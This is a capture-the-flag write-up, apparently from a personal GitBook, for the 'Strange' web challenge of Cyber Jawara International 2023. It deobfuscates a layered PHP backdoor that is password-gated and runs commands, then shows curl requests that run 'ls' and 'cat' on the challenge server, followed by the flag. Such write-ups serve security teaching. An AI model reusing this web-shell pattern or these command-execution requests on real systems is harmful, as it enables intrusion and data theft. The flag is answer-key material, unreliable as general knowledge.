⏪
CTFs
TwitterGithub
  • 👋Introduction
  • 📚Write Up
    • 2024
      • 📖1337UP LIVE CTF
        • Reverse Engineering
        • Mobile
        • Forensic
        • Misc
      • 📖HKCERT CTF Quals
        • Reverse Engineering
        • Binary Exploitation
      • 📖Flare-On 11
        • Challenge #1 - frog
      • 📖Intechfest
        • Reverse Engineering
        • Forensic
        • Cryptography
        • Mobile
      • 📖Cyber Breaker Competition (1v1)
        • Reverse Engineering
        • Web Exploitation
        • Cryptography
        • Binary Exploitation
      • 📖Cyber Breaker Competition Quals
        • Reverse Engineering
        • Web Exploitation
        • Cryptography
      • 📖BlackHat MEA Quals
        • Reverse Engineering
        • Forensic
      • 📖TFC CTF
        • Reverse Engineering
        • Forensic
        • Misc
      • 📖DeadSec CTF
        • Reverse Engineering
        • Web Exploitation
      • 📖Aptos - Code Collision CTF
        • Reverse Engineering
        • Misc
      • 📖DownUnder CTF
        • Reverse Engineering
      • 📖JustCTF
        • Reverse Engineering
        • Forensic
        • Misc
      • 📖Akasec CTF
        • Reverse Engineering
        • Forensic
      • 📖Codegate CTF Preliminary
        • Reverse Engineering
      • 📖NahamCon CTF
        • Cryptography
        • Reverse Engineering
        • Malware
        • Misc
        • Mobile
        • Scripting
        • Web Exploitation
        • Forensic
      • 📖SAS CTF Quals
        • Reverse Engineering
      • 📖SwampCTF
        • Reverse Engineering
        • Misc
        • Cryptography
      • 📖UNbreakable International
        • Reverse Engineering
        • Network
        • Cryptography
      • 📖ACSC
        • Reverse Engineering
        • Hardware
        • Web Exploitation
      • 📖0xL4ugh
        • Mobile
    • 2023
      • 📖BlackHat MEA Final
        • Reverse Engineering
        • Web Exploitation
      • 📖Flare-On 10
        • Challenge #1 - X
        • Challenge #2 - ItsOnFire
        • Challenge #3 - mypassion
        • Challenge #4 - aimbot
        • Challenge #5 - where_am_i
        • Challenge #6 - FlareSay
        • Challenge #7 - flake
        • Challenge #8 - AmongRust
        • Challenge #9 - mbransom
        • Challenge #10 - kupo
        • Challenge #11 - over_the_rainbow
        • Challenge #12 - HVM
        • Challenge #13 - y0da
      • 📖LakeCTF Quals
        • Reverse Engineering
        • Cryptography
      • 📖TSG CTF
        • Reverse Engineering
        • Cryptography
      • 📖ISITDTU Quals
        • Web Exploitation
        • Misc
        • Reverse Engineering
      • 📖BlackHat MEA Quals
        • Reverse Engineering
      • 📖ASCIS Final
        • Reverse Engineering
        • Web Exploitation
        • Cryptography
      • 📖ASCIS Quals
        • Reverse Engineering
        • Forensic
        • Cryptography
      • 📖IFest
        • Reverse Engineering
        • Cryptography
        • Misc
      • 📖Cyber Jawara International
        • Reverse Engineering
        • Forensic
        • Cryptography
        • Web Exploitation
      • 📖Intechfest
        • Reverse Engineering
        • Forensic
        • Cryptography
        • Mobile
      • 📖CSAW Quals
        • Reverse Engineering
      • 📖SECCON Quals
        • Reverse Engineering
      • 📖CTFZone Quals
        • Reverse Engineering
      • 📖Securinets Quals
        • Reverse Engineering
      • 📖Compfest Final (Attack Defense)
        • Web Exploitation
        • Cryptography
      • 📖Compfest Quals
        • Reverse Engineering
        • Cryptography
        • Forensic
        • Misc
      • 📖Tenable
        • Reverse Engineering
        • Cryptography
        • Steganography
      • 📖ASCWG Quals
        • Reverse Engineering
        • Cryptography
      • 📖Gemastik Quals
        • Reverse Engineering
      • 📖BSides Indore
        • Reverse Engineering
        • Cryptography
      • 📖NahamCon CTF
        • Cryptography
      • 📖HSCTF
        • Reverse Engineering
        • Cryptography
        • Web Exploitation
        • Misc
      • 📖ACSC
        • Reverse Engineering
      • 📖HackTM Quals
        • Reverse Engineering
    • 2022
      • 📖Intechfest
        • Reverse Engineering
        • Mobile
        • Cryptography
      • 📖NCW Final
        • Reverse Engineering
      • 📖NCW Quals
        • Reverse Engineering
        • Misc
        • Cryptography
      • 📖Compfest Final
        • Reverse Engineering
        • Forensic
      • 📖Compfest Quals
        • Reverse Engineering
        • Cryptography
      • 📖IFest
        • Reverse Engineering
        • Cryptography
        • Forensic
    • 2021
      • 📖Cyber Jawara Final
        • Reverse Engineering
      • 📖Cyber Jawara Quals
        • Reverse Engineering
        • Cryptography
      • 📖DarkCon CTF
        • Reverse Engineering
      • 📖Wreck IT Quals
        • Mobile
      • 📖MDT4.0 Final
        • Reverse Engineering
        • Cryptography
        • Forensic
      • 📖MDT4.0 Quals
        • Reverse Engineering
        • Cryptography
      • 📖IFest
        • Reverse Engineering
        • Cryptography
      • 📖Compfest Final
        • Reverse Engineering
      • 📖Compfest Quals
        • Reverse Engineering
        • Cryptography
    • 2020
      • 📖Deep CTF
        • Reverse Engineering
  • 🚩Lifetime CTF
    • 📖Hack The Box
      • Reverse Engineering
        • TBU
Powered by GitBook
On this page
  • Strange (392 pts)
  • Description
  • Solution
  1. Write Up
  2. 2023
  3. Cyber Jawara International

Web Exploitation

PreviousCryptographyNextIntechfest

Last updated 9 months ago

Challenge
Link

Strange (392 pts)

Strange (392 pts)

Description

-

Solution

We were given an obfuscated PHP file (We forgot to save the original file, this picture below is the simplified version and little bit of deobfuscated variable name)

After renaming the variable we can see that there is process of uncompress and base64 decode so the next step is echoing those part.

<?php
$_ = 'eNrtWk1vo0gQvUfa/+DDSM5Iowiwk6wV+WDMhyFDO2DAwCWywYM/cHBiJxh+/VZ1Y5zs5jCrXa20o36WklR3V9Wj6nVZit1qMXx5BPTbu5fV0+FH+46aNfrt0SzeLJLWMJvt91dXV+27i9qr9dsFf51fF1i21r+I/l9W2oHY24dTcRXpar9Nl87d+CnUre23ODg4OH5NtOOtLySB+WrovhROi9zUej+CcnPLhiZMTTauH3mpODg4ODg4ODg4OP5v4P/O4ODg4Ph10Z7P9oub7mOyiPNk0b7jFeHg4ODg4PhH+Ph5fyT1hHkpa7afCfZ6nzqeFiWqcWMMnTyWxHU8HPSMoRlbriEFSngMRqkY+sXRWiewZqMthVkhEboWwZoqwpow1oojcR306wSKKlgZ7Cvo4xUYw/KPXeJG8UKJVrBfkgzstQa2d437BM+vTbS76E802Kf+AwnjR2f/DfpbGbMpT9gnItiVE5O1DGeAt6IWNIeOOWKBxUROTv1swNFvctIYIeaA/YYT7le47yypP+WQnPwLUtcFOK3BrqyVcWvoyVui/54mU020BPXW0OSMVGkxXg02E2mpETfFj6tsVyTetHS8ZHP9OtOE3biUn+Yd583Q7c58eliDbbsBGUdKntY90xPP/+65+5Ntgu8sVsAe5eV0W2APFduX1dkKeqgMGi6L0W4cboVbY+S/zDfH4Xgl76LVIDcm6cYWNNvR8/RhOBDuJ5t0ceKhmttAuhaAR+8UJ5KWE2+TQtyeM6lkF59pVslPvmqkDxP4e0QOYWeQfof1aZCo0UZoONQckcMycYk8Pp9B3xWtN/bcJdhzsemHS/vRoboTQWO0f3GJNq2/QjVYUn8R+4H+tJ8i1Yjun7Rc0B7hWiWfes5iumjbVaO7LTlpoDPGHK6P+108P6YcfaZ7RRUt1N1UY5wwPnC2IH6tS5Hqkul2fdZ1hvFRoyLTpMmekWlSoneFxoiP9K5o9RqN42zZ/WI8oVYlPVPzrGvXsbAWrrU666ruWSkPx6PkNazy1FSJ7KnO8325b/rkqWLlbm2wxQPxSPFeK4EoP3iiMw+3WhW5oRBIThZKvU0Ee7GuQe2NXTAZ9B5cITX1fRGJzvCDprTddeTvjPeaWqyTTuLDPRnlnaTjO+/uCehCrpKRWUZBmH+SEzUj0TlD7yDtZ2XhHFIIzAGqAwFrEU6M3f353jxHT+ZyDHbikb3zFOK9KcIAZsqKzb4Fm3sCEU8zzauaOag0919i82BZ5xqUjT7WLD/0KqOcUAM6xlGLRtdbk/USbKoZCWZX5b3rV13/hi/0S3Mkd3udG4qQfloP1IV44jhAjh064yqNzWXkAjZh9aIzjvKlMzLssnqyZ/rz80ANRDZT0d9evaunHblx18I5xOYD1vPFgmllYz11cxlLnkQ04Dglb5Hu5Y02zjFG82m0teD9qJ5VN4YKJ7wD6KGux2l2NWfzdKbvnue6enPSkr1eduZb69ZQM8nNdqjdYZT1XpPzDBVt6agnkCdSksNMsm4aTab9fvvu4uK/f2Pu09+XtfX17u+4v/P9Gccv54SXbfzZ/tak5d/7+/x7fx9rd/mhWax0X+/+AHJ5pAE=';
echo gzuncompress(base64_decode($_));
?>

After that we will get another obfuscated code so do the same process again (echoing the encoded part)

<?php
function __lambda($sArgs, $sCode)
        {
                return eval("return function($sArgs){{$sCode}};");
        }

$____='printf';$___________='Hacked Class...';
$___ =  'X19sYW1iZGE='     ;
$______= 'cmV0dXJuIGV2YWwoJF9fXyk7'      ;
$____ = 'base64_decode'; 
$___________='Z290byBFQVl0QjsgRUFZdEI6ICRoc21jcCA9ICJcMTI2XDYxXHg1YVwxMjdcMTQxXHg2Ylw2NVwxMjZcMTE1XHg0OFwxNTRcMTI3XDE0MlwxMDdcMTUwXHg1MVx4NTZceDZiXDEyNlx4NjFceDU5XHg1NlwxMjJceDU4XDE0NFx4NDdcMTA2XHg0ZVx4NTZceDZkXDEyMlx4NTZcMTI2XHg0N1x4NzRcNjBceDYxXDEwNlx4NGFceDc0XDE0NFwxMDRcMTI2XDE0MVwxMjJceDU2XHg0YVx4NDRceDU5XHg1NVwxMzJceDRhXDE0NVx4NTdcMTI2XDEwNVwxMjdceDZjXDEzMiI7IGdvdG8gdWF1M0E7IFBlNzgwOiAkS2hFNTgoJF9QT1NUWyRUdk5uaF0pOyBnb3RvIGQ3bWtjOyBQTXNOZDogZ290byBGdUVLUTsgZ290byBJdk5acDsgZHoyWmw6ICRDQVBEaiA9IDA7IGdvdG8geHpOYm07IHVrbkxCOiBpZiAoISgkQ0FQRGogPCA0KSkgeyBnb3RvIEJmX250OyB9IGdvdG8gZ2hSUkg7IG9RSzBTOiAkazBnVEIgPSAkaHNtY3AgLiAkWXdEZk07IGdvdG8gZHoyWmw7IHVhdTNBOiAkWXdEZk0gPSAiXHg1NFx4NTNcMTA1XHg0YVx4NTRceDU3XHg2Y1wxNDRcMTcyXHg2NVwxMDZcMTEyXHg1N1wxMjNcMTU2XHg1Mlx4NGVcMTI2XDYwXDEzMlx4NzBceDU2XHg2Y1wxNTBceDQzXDE0NFx4NmNceDU5XHg3OVwxMTVceDQ4XHg2OFx4NTVcMTE1XDE1M1x4NWFcMTcyXDEzMVx4MzBcMTI2XHg1N1x4NTZceDZjXDE0NFx4NDlceDUxXDE1NFwxMDJceDU3XDE0MVw2MVx4NzBcMTcxXDEyNFw2MVx4NTZceDRmXDE0Mlx4NmNcMTAyXDEyNVwxMTVcMTA1XHg3M1wxMTMiOyBnb3RvIG9RSzBTOyBCOHduYzogJENBUERqKys7IGdvdG8gUE1zTmQ7IG1tNUNwOiBpZiAoISgkX1BPU1RbYmFzZTY0X2RlY29kZSgkcGFxMjIpXSA9PT0gJGswZ1RCKSkgeyBnb3RvIFp5ZVpIOyB9IGdvdG8gejd3dVE7IHo3d3VROiAkS2hFNTggPSBzdHJyZXYoYmFzZTY0X2RlY29kZSgiXHg2MlwxMjdceDU2XHgzMFwxNDNcNjNcMTU0XHg3YSIpKTsgZ290byBqZnJhOTsgdUNsRnY6ICRwYXEyMiA9ICJceDYxXHg0N1wxNTRcMTUzXHg1YVwxMDdcMTI2XDE2NVx4NThcNjNcMTAyXHg2OFx4NjNcNjNceDRlXHgzM1x4NGRcMTEwXHg0YVx4NmJceDRmXHg0MVx4M2RcNzUiOyBnb3RvIG1tNUNwOyBqZnJhOTogJFR2Tm5oID0gYmFzZTY0X2RlY29kZSgiXDE0M1wxMDdcMTA2XDE3MVwxMzFcMTI3XHgzMVwxNjdceDU5XHg1OFx4NGFceDY4XHg2Mlx4NThcMTAyXHg2OFx4NjNcMTU1XDEwNlwxNjQiKTsgZ290byBQZTc4MDsgZ2hSUkg6ICRrMGdUQiA9IGJhc2U2NF9kZWNvZGUoJGswZ1RCKTsgZ290byBHbWZmMjsgeHpOYm06IEZ1RUtROiBnb3RvIHVrbkxCOyBHbWZmMjogaGpqbGE6IGdvdG8gQjh3bmM7IEl2TlpwOiBCZl9udDogZ290byB1Q2xGdjsgZDdta2M6IFp5ZVpIOg==';
$______=$____($______);
$___=$____($___);
// echo $___;
$_____=$___('$___',$______);
// echo $_____;
// $_____($____($___________));
echo $____($___________);
?>

The last part more readable, we just need to give enter on each ; part.

So basically there are 2 $_POST variable , so dump each name and value for the mm5Cp part.

<?php
$hsmcp = "\126\61\x5a\127\141\x6b\65\126\115\x48\154\127\142\107\150\x51\x56\x6b\126\x61\x59\x56\122\x58\144\x47\106\x4e\x56\x6d\122\x56\126\x47\x74\60\x61\106\x4a\x74\144\104\126\141\122\x56\x4a\x44\x59\x55\132\x4a\145\x57\126\105\127\x6c\132";
$YwDfM = "\x54\x53\105\x4a\x54\x57\x6c\144\172\x65\106\112\x57\123\156\x52\x4e\126\60\132\x70\x56\x6c\150\x43\144\x6c\x59\x79\115\x48\x68\x55\115\153\x5a\172\131\x30\126\x57\x56\x6c\144\x49\x51\154\102\x57\141\61\x70\171\124\61\x56\x4f\142\x6c\102\125\115\105\x73\113";
$k0gTB = $hsmcp . $YwDfM;
echo base64_decode($k0gTB);
echo base64_decode("\x61\x47\154\153\x5a\107\126\165\x58\63\102\x68\x63\63\x4e\x33\x4d\110\x4a\x6b\x4f\x41\x3d\75"). "\n";
echo strrev(base64_decode("\x62\127\x56\x30\143\63\154\x7a")) . "\n";
echo base64_decode("\143\107\106\171\131\127\x31\167\x59\x58\x4a\x68\x62\x58\102\x68\x63\155\106\164");
?>

As we can see on the latest deobfusacted part, there are looping. So in this case we try to base64 decode the hidden_passw0rd8 value 4 times and we got readable string.

Since the first decode has been done in php part so we just need to do the rest 3 iteration. After found the correct password we just need to send the command to paramparamparam. Here is curl command we used to solve the challenge

curl -X POST https://strange.hackthesystem.pro/upload/uploaded.php -d "hidden_passw0rd8=howyoucancrackthis?4301ffbafccd4356&paramparamparam=ls -al /"

curl -X POST https://strange.hackthesystem.pro/upload/uploaded.php -d "hidden_passw0rd8=howyoucancrackthis?4301ffbafccd4356&paramparamparam=ls -al /app"

curl -X POST https://strange.hackthesystem.pro/upload/uploaded.php -d "hidden_passw0rd8=howyoucancrackthis?4301ffbafccd4356&paramparamparam=cat /app/flag-5af2e94a1940dadb4db81cb261dda81a6cd68503.php"

Flag : CJ2023{cbbfdd471b88dd4f34e02360d4629399a1b261f0}

📚
📖
Here